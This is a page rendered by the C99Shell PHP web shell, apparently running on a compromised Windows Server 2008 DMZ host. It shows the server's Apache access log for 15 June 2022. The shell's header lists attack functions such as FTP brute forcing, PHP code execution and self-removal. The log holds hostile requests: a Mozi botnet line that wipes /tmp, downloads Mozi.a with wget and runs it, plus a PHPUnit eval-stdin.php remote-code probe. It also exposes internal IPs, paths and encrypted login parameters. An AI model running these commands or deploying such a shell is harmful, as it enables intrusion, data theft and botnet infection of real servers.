!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.06.15.log (1.89 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [14/Jun/2022:23:59:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.8 - - [15/Jun/2022:00:00:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201050-1099.tif HTTP/1.1" 200 4573468
35.204.132.105 - - [15/Jun/2022:00:03:35 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Jun/2022:00:04:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:04:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:04:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
13.66.139.13 - - [15/Jun/2022:00:06:49 -0500] "-" 408 -
157.55.39.43 - - [15/Jun/2022:00:07:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/2331.pdf HTTP/1.1" 304 -
216.245.221.92 - - [15/Jun/2022:00:09:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:09:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [15/Jun/2022:00:11:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [15/Jun/2022:00:10:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [15/Jun/2022:00:14:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:15:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.128.50 - - [15/Jun/2022:00:17:32 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [15/Jun/2022:00:16:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
172.22.2.4 - - [15/Jun/2022:00:18:21 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8292
172.22.2.4 - - [15/Jun/2022:00:18:22 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [15/Jun/2022:00:18:33 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=competencia-estructura&ano=&resuelve= HTTP/1.1" 200 116017
216.245.221.92 - - [15/Jun/2022:00:19:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.86 - - [15/Jun/2022:00:21:05 -0500] "-" 408 -
201.245.192.253 - - [15/Jun/2022:00:21:16 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jun/2022:00:21:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45443
201.245.192.253 - - [15/Jun/2022:00:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47368
172.22.2.4 - - [15/Jun/2022:00:21:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:22:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [15/Jun/2022:00:24:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:25:57 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
207.46.13.172 - - [15/Jun/2022:00:26:40 -0500] "GET /catalogoisis/js/remote.js HTTP/1.1" 200 436
35.208.187.63 - - [15/Jun/2022:00:27:33 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:27:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Jun/2022:00:29:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:28:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
172.22.2.4 - - [15/Jun/2022:00:31:56 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2026%20de%20Mayo%20de%202011.pdf HTTP/1.1" 304 -
201.245.192.253 - - [15/Jun/2022:00:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45443
201.245.192.253 - - [15/Jun/2022:00:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47368
216.245.221.92 - - [15/Jun/2022:00:34:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:33:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:34:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:00:39:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.87 - - [15/Jun/2022:00:40:26 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:00:39:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:39:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
201.245.192.253 - - [15/Jun/2022:00:41:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45443
201.245.192.253 - - [15/Jun/2022:00:42:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47368
216.245.221.92 - - [15/Jun/2022:00:44:27 -0500] "HEAD / HTTP/1.1" 200 -
13.66.139.4 - - [15/Jun/2022:00:44:45 -0500] "GET /BLA/resoluciones/AUTOS%202020/1494.pdf HTTP/1.1" 200 821182
172.22.2.4 - - [15/Jun/2022:00:44:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:00:47:15 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:00:45:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59075
216.245.221.92 - - [15/Jun/2022:00:49:27 -0500] "HEAD / HTTP/1.1" 200 -
223.155.81.185 - - [15/Jun/2022:00:51:37 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 1018
172.22.2.4 - - [15/Jun/2022:00:50:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.31.180.175 - - [15/Jun/2022:00:52:55 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/7mwjvmrI/sn62thalfgRPwL5D9wAqqZwtnah9ROICmFRmlyHHmbCp&y=U2FsdGVkX198skV8yQLPcc7FAE1HREIE7BYeSVF6JUM/Tx64W7sxAltXqx2BTOAy HTTP/1.1" 200 31
186.31.180.175 - - [15/Jun/2022:00:52:57 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/MY8/DGaovJhrEoZZhwGFRlwzzxbjssAMlx0umD7QNo9vCw1ZMq1GV&y=U2FsdGVkX1/QDIA02l0Sh5/8VzMIbDZKyeTp1OuGN1CMRIKn3GdsHgYYG81pkFAV HTTP/1.1" 200 31
186.31.180.175 - - [15/Jun/2022:00:53:01 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Qv+1WUVM7UsLPsU9kFzLqyZbPyXFAaVZWd1We8JO/Ys+pGwdxpRmZ&y=U2FsdGVkX18xI9DYcqhd7AQLFfdkn9hZoxhf8CTBN2RhB34OhfJfZIuKl+mTyMqQ HTTP/1.1" 200 30
186.31.180.175 - - [15/Jun/2022:00:53:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19ZxOH0EFyKhoDA/L0iunvPadiezpRCIcM6cHO1NYfyYQPH4x83CW61GgQWXRbC9aB2LRJiL+1Pq8gUj9JpIP1MxeMqKWmA4is=&u=U2FsdGVkX194aDrDti5Gc7NGy8NmCeu7pTMRrnlcBAk=&y=U2FsdGVkX18xI9DYcqhd7AQLFfdkn9hZoxhf8CTBN2RhB34OhfJfZIuKl+mTyMqQ HTTP/1.1" 200 97
186.31.180.175 - - [15/Jun/2022:00:53:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19BSdqEVNqAy1FPSXwVZaDTZW2nlphm2b5lD8c2TzX04khqYIL0LwesdCoZK+uHw+j+TmkUNV4c1Y6TPvgleu+/iBMDLyRGqBzM799hCkOsvJ2/NeEH/YuX1fzZ6i9LFlkXIW7w3ia1ufUigvmTHmEFlF6jTpDx7RTYCmn2l+EZ/qIr+titVBrJ7LfmN/Z11QEFvD6pQLmkbNgoe5kSZjUGeaM9SYfJyBf0pYtDjqPA4L2GJuBdKSFUqPvRJOA2Chp4TuFiuMteuSqCazlTsG3dUlSP/k5hB7c3yQZF5+exIMRd9EA74eSCgl+grmHs3yQyaWns3ZyQsqSUMhCQp9FjJ31kw1EymaFnABvS6rAQ6CwZCn7lrApr1dmaPOsJAYKWAwhm+/YY20KKNST+Pg9kL4DIZpGDvMxgWC1WRK9tBPi3GtNf/YPnkHH67sRvnrD6KxLaOP4H1oJkh16hbFm9GkrEsXK+JrPfC8/LUT0eCUdbUsuO0m7PrAFtvJvS5LF4y3XqU2J1CvpJQ9+/7ZB8ARObXs7HDDZC6cFN1VC9filA6QB3Siut1/CqBcnUN9ubV7M04T68e5YU3AYJwPO9c4UkjajRn7kNg3xO7pJaksTYvCuorqP8qKsA2S+7sYf2rlUqpAWNs09ERC7YE5K3UbnzTTw1SJYnXaan7HlNN8FmXl+3f9ii+cJpeQTVyPP6VjjqKDj8J+D7O5RJV1IeVwBJRQvzsTaIDNvCYjSva3h/pK1itYslwDRGLXDdms/9sZRkOy2HW7LhnkTPfhSJ6cg3sU2nHV02Ocm63g5ob1grpZ9xvJm1uosN6NFgMzbZr3FDX4P8B//hJi1QNMKWUVl266ofW1qYePu08PrKaFXanBVKZZkVvI6iF64RfZ8qvnOl6JLpUMSfXoQoOd42IPdvPNP0/uLatKBoAEfBcBZWZliRtbCtGQi5Y1tuKn8/lEc7FVlaktpTR8nQKq+p8H/i/zl0SzXd3n02zPwuOuDEYwpDaSxnUARoNZIkFLOc0Sj3LuxPmB8XRnbYRykC2JO2fZ+J3iVJx92WhWlhmTEyZ+TM4CWH0bvP+MaexFq1sBI0hHiMeFtOK5H+Ji31IFCijL2IJtK8DIkuRunRXJrGxq1BFShuW4BHuyYQcUAgkLIuGIjVPRhr0VP4whaijtRZYuOiHUMiot2DYlF/zVg3BLW90KKvdPGEGrape4zuQNqiAaoOzLeKK6UypDHwPHm98W7kPno452D59bRgtnXGz8mF7c5zt1FHrVIF0u5b29kb1j/wpWxApOk1mKnvhZBp1tfrgkzTXatRZRQzOkScldPpBylMvT4nPTTxorLHPiuiZtYbbhUP8FSddfx1bbk+T8hJMHw=&u=U2FsdGVkX194aDrDti5Gc7NGy8NmCeu7pTMRrnlcBAk=&y=U2FsdGVkX18xI9DYcqhd7AQLFfdkn9hZoxhf8CTBN2RhB34OhfJfZIuKl+mTyMqQ HTTP/1.1" 200 6473
186.31.180.175 - - [15/Jun/2022:00:53:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+XvFi0FKb2MYvauirUEswcMHQC+XH6DVuattsdvRD8GTuRSzYBhM1RqwOnlPvRdPsOm9bmgOKp5Iibpkqtocfmi+YgNKS36GsB3JLRbmmRwz2dllKQ8G17Dht69Gcfwq51mvLhfZMV+khtVDps5az/kqnGUXs7gko4u6/tI03eybUwALpVmXdzgKMrA28Gl20H2a6lxqwj3EPjMq4yr5jrkjEKSvweWN21n9L8nppZSJfm6z40I0FOx1CVXSM/DV1n6tfwFAyeZRScrJlDLGBh6Q6EtQBMoRg=&u=U2FsdGVkX194aDrDti5Gc7NGy8NmCeu7pTMRrnlcBAk=&y=U2FsdGVkX18xI9DYcqhd7AQLFfdkn9hZoxhf8CTBN2RhB34OhfJfZIuKl+mTyMqQ HTTP/1.1" 200 176
186.31.180.175 - - [15/Jun/2022:00:53:01 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+Qv+1WUVM7UsLPsU9kFzLqyZbPyXFAaVZWd1We8JO/Ys+pGwdxpRmZ HTTP/1.1" 200 30992
172.22.2.4 - - [15/Jun/2022:00:51:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
66.249.66.85 - - [15/Jun/2022:00:53:22 -0500] "-" 408 -
110.172.172.90 - - [15/Jun/2022:00:53:54 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Jun/2022:00:54:27 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [15/Jun/2022:00:55:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/4503.pdf HTTP/1.1" 304 -
172.22.2.4 - - [15/Jun/2022:00:56:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:00:57:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
152.61.192.232 - - [15/Jun/2022:00:59:01 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [15/Jun/2022:00:59:02 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [15/Jun/2022:00:59:02 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [15/Jun/2022:00:59:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:02:05 -0500] "POST /BLA/boletinlegal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
66.249.66.85 - - [15/Jun/2022:01:02:26 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:01:01:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59075
172.22.2.4 - - [15/Jun/2022:01:02:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Jun/2022:01:04:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:03:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
172.22.2.4 - - [15/Jun/2022:01:07:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
152.61.128.50 - - [15/Jun/2022:01:08:01 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [15/Jun/2022:01:08:02 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [15/Jun/2022:01:08:03 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [15/Jun/2022:01:09:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:08:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:09:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:01:14:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:13:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:01:15:42 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:01:14:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [15/Jun/2022:01:19:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:19:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:01:22:00 -0500] "-" 408 -
201.245.192.253 - - [15/Jun/2022:01:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45569
172.22.2.4 - - [15/Jun/2022:01:20:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
201.245.192.253 - - [15/Jun/2022:01:22:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47372
172.22.2.4 - - [15/Jun/2022:01:23:22 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
216.245.221.92 - - [15/Jun/2022:01:24:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:25:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.97.9.11 - - [15/Jun/2022:01:28:04 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
191.97.9.11 - - [15/Jun/2022:01:28:04 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.97.9.11 - - [15/Jun/2022:01:28:05 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
191.97.9.11 - - [15/Jun/2022:01:28:05 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
191.97.9.11 - - [15/Jun/2022:01:28:07 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
191.97.9.11 - - [15/Jun/2022:01:28:07 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
191.97.9.11 - - [15/Jun/2022:01:28:07 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
191.97.9.11 - - [15/Jun/2022:01:28:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 388924
172.22.2.4 - - [15/Jun/2022:01:26:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.127 - - [15/Jun/2022:01:28:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.66.85 - - [15/Jun/2022:01:29:25 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:01:29:27 -0500] "HEAD / HTTP/1.1" 200 -
79.110.73.9 - - [15/Jun/2022:01:31:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5029.pdf HTTP/1.1" 200 391999
201.245.192.253 - - [15/Jun/2022:01:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45569
201.245.192.253 - - [15/Jun/2022:01:32:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47372
172.22.2.4 - - [15/Jun/2022:01:31:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.96.106.54 - - [15/Jun/2022:01:33:18 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [15/Jun/2022:01:32:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56776
172.22.2.4 - - [15/Jun/2022:01:33:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [15/Jun/2022:01:34:27 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.79 - - [15/Jun/2022:01:38:53 -0500] "GET /Publicaciones/2022EE83627.pdf HTTP/1.1" 404 227
172.22.2.4 - - [15/Jun/2022:01:37:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Jun/2022:01:39:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:38:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57156
66.249.66.85 - - [15/Jun/2022:01:39:59 -0500] "-" 408 -
201.245.192.253 - - [15/Jun/2022:01:41:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45569
201.245.192.253 - - [15/Jun/2022:01:42:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47372
216.245.221.92 - - [15/Jun/2022:01:44:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:43:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.21 - - [15/Jun/2022:01:45:30 -0500] "GET /Publicaciones/2022EE20499.pdf HTTP/1.1" 404 227
172.22.2.4 - - [15/Jun/2022:01:44:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
66.249.66.85 - - [15/Jun/2022:01:46:30 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:01:49:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:49:46 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [15/Jun/2022:01:48:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:49:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
66.249.66.85 - - [15/Jun/2022:01:53:51 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:01:54:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:54:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:01:55:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:01:59:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:02:00:39 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:02:00:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:01:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
46.249.32.156 - - [15/Jun/2022:02:03:42 -0500] "GET / HTTP/1.1" 400 946
216.245.221.92 - - [15/Jun/2022:02:04:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:02:06:16 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:02:06:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:07:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:02:09:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:12:21 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 304 -
66.249.66.85 - - [15/Jun/2022:02:12:44 -0500] "-" 408 -
40.77.167.21 - - [15/Jun/2022:02:13:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
172.22.2.4 - - [15/Jun/2022:02:12:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Jun/2022:02:14:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:13:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56776
69.63.184.118 - - [15/Jun/2022:02:15:20 -0500] "GET /dora-villalobos-la-protectora-del-humedal-la-vaca.html HTTP/1.1" 206 893
157.55.39.127 - - [15/Jun/2022:02:16:29 -0500] "GET /Publicaciones/2022EE28306.pdf HTTP/1.1" 404 227
172.22.2.4 - - [15/Jun/2022:02:18:23 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [15/Jun/2022:02:18:45 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
66.249.66.85 - - [15/Jun/2022:02:19:18 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:02:19:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:18:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:18:24 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 48247
172.22.2.4 - - [15/Jun/2022:02:19:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51841
201.245.192.253 - - [15/Jun/2022:02:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45560
201.245.192.253 - - [15/Jun/2022:02:22:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47542
40.77.167.79 - - [15/Jun/2022:02:23:06 -0500] "GET /BLA/resoluciones/850-899.tif HTTP/1.1" 404 1018
13.66.139.13 - - [15/Jun/2022:02:24:27 -0500] "-" 408 -
216.245.221.92 - - [15/Jun/2022:02:24:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:23:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:02:26:21 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:02:24:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [15/Jun/2022:02:29:27 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.21 - - [15/Jun/2022:02:30:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
172.22.2.4 - - [15/Jun/2022:02:29:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Jun/2022:02:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45560
172.22.2.4 - - [15/Jun/2022:02:30:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
66.249.66.85 - - [15/Jun/2022:02:32:34 -0500] "-" 408 -
201.245.192.253 - - [15/Jun/2022:02:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47542
20.96.170.139 - - [15/Jun/2022:02:32:30 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
216.245.221.92 - - [15/Jun/2022:02:34:27 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [15/Jun/2022:02:35:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0126.pdf HTTP/1.1" 304 -
172.22.2.4 - - [15/Jun/2022:02:35:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.79 - - [15/Jun/2022:02:38:08 -0500] "GET /bla/resoluciones/resoluciones%202022/0046.pdf HTTP/1.1" 304 -
172.22.2.4 - - [15/Jun/2022:02:36:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
35.204.36.241 - - [15/Jun/2022:02:38:52 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [15/Jun/2022:02:39:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.85 - - [15/Jun/2022:02:41:04 -0500] "-" 408 -
201.245.192.253 - - [15/Jun/2022:02:41:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45560
201.245.192.253 - - [15/Jun/2022:02:42:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47542
172.22.2.4 - - [15/Jun/2022:02:41:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:02:42:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [15/Jun/2022:02:44:27 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.25 - - [15/Jun/2022:02:45:03 -0500] "-" 408 -
69.63.184.119 - - [15/Jun/2022:02:47:08 -0500] "GET /images/lluvias-arboles-4-junio.jpeg HTTP/1.1" 200 117524
69.63.184.117 - - [15/Jun/2022:02:47:12 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
173.252.127.2 - - [15/Jun/2022:02:47:15 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
69.63.184.1 - - [15/Jun/2022:02:47:15 -0500] "GET /images/reciclaton-mayo-3-mayo.jpg HTTP/1.1" 200 278453
66.249.66.85 - - [15/Jun/2022:02:47:20 -0500] "-" 408 -
172.22.2.4 - - [15/Jun/2022:02:47:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Jun/2022:02:49:27 -0500] "HEAD / HTTP/1.1" 200 -
